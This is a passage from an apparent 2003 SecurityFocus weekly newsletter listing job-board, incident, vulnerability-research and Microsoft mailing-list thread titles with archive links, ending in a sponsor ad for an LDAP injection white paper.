http://www.securityfocus.com/archive/77/330985
30. Open Positions at LURHQ Corporation (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/330980
31. Seeking Information Security Position in the SF Bay Area (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/330978
32. Network Security Engineer - Washington, DC (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/330977
33. Alexandria, VA - Sr Mgmt Systems Programmer wanted (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/330976
34. Security Software Developer available (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/330975
VI. INCIDENTS LIST SUMMARY
-------------------------
1. Command Line RPC vulnerability scanner? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/331427
2. Scan of TCP 552-554 (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/331331
3. RPC DCOM exploit (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/331327
4. Scans for 17300/tcp starting again (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/331293
5. Exploit for Windows RPC may be in the wild! (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/331226
6. new worm? or DDoS attack in progress (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/331221
7. Importance of outbound traffic filtering (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/331222
8. floods through our proxy (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/331008
9. Anyone know this tool? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/330901
10. email worm? Newsletter, aaa.exe, caraoke ksp.exe (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/330715
11. www.google.com reference in directory-traversal attack (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/330707
12. New or old PHP worm? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/330693
13. Is this enough to identify this by? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/330692
14. "access_log?hello" ? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/330760
15. First time security issue. (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/330688
16. [security-elvandar] "access_log?hello" ? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/330691
17. Heavy port 1214 traffic revisited (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/330610
18. First Time Security Incident (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/330612
19. email worm? Newsletter, aaa.exe, caraoke ksp.exe (fwd) (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/330607
20. New worm in Japan? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/330606
21. Port 0 packets (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/330609
VII. VULN-DEV RESEARCH LIST SUMMARY
----------------------------------
1. Analyze binary for holes (Thread)
Relevant URL:
http://www.securityfocus.com/archive/82/331364
2. Some help With BOF Exploits Writing. - EAX ?! (Thread)
Relevant URL:
http://www.securityfocus.com/archive/82/331362
3. Password Cracking Challenge... (Thread)
Relevant URL:
http://www.securityfocus.com/archive/82/331319
4. perl/php connect-back backdoor? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/82/331107
5. VL: Remote Linux Kernel < 2.4.21 DoS in XDR routine. (Thread)
Relevant URL:
http://www.securityfocus.com/archive/82/331106
6. is it even possible for a worm with dcom vuln? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/82/331103
7. Some help With BOF Exploits Writing. (Thread)
Relevant URL:
http://www.securityfocus.com/archive/82/331099
8. process on win2K (Thread)
Relevant URL:
http://www.securityfocus.com/archive/82/330711
9. Thanks much! (Thread)
Relevant URL:
http://www.securityfocus.com/archive/82/330433
10. Unbreakable Lotus Notes (Thread)
Relevant URL:
http://www.securityfocus.com/archive/82/330434
VIII. MICROSOFT FOCUS LIST SUMMARY
---------------------------------
1. DCOM RPC exploit as a virus/trojan? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/331422
2. change NT passwords Kerberos (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/331421
3. How to silently deploy DirectX9b? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/331419
4. Windows XP "write attributes" permission for Users (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/331275
5. IAS as a RADIUS server (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/331114
6. HTASploit (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/331021
7. ISA Server and Win2k3 standard OS (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/330884
8. SecurityFocus Microsoft Newsletter #147 (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/330740
9. monitor folders (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/330728
10. Tracking down a user in a large AD network (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/330724
IX. SUN FOCUS LIST SUMMARY
--------------------------
1. NO NEW POSTS FOR THE WEEK ENDING 08.01.03
X. LINUX FOCUS LIST SUMMARY
---------------------------
1. NO NEW POSTS FOR THE WEEK ENDING 08.01.03
XI. SPONSOR INFORMATION
-----------------------
This Issue is Sponsored by: SPI Dynamics
NEW ALERT:
"How a Hacker Launches a LDAP Injection Attack Step-by-Step"
It's as simple as placing additional LDAP query commands
into a Web form input box giving hackers complete access
to all your backend systems! Firewalls and IDS will not
stop such attacks because LDAP Injections are seen as valid
data.
Download this *FREE* white paper from SPI Dynamics for a
complete guide to protection!
http://www.securityfocus.com/SPIDynamics-sf-news5
--------------------------------------------------------------------------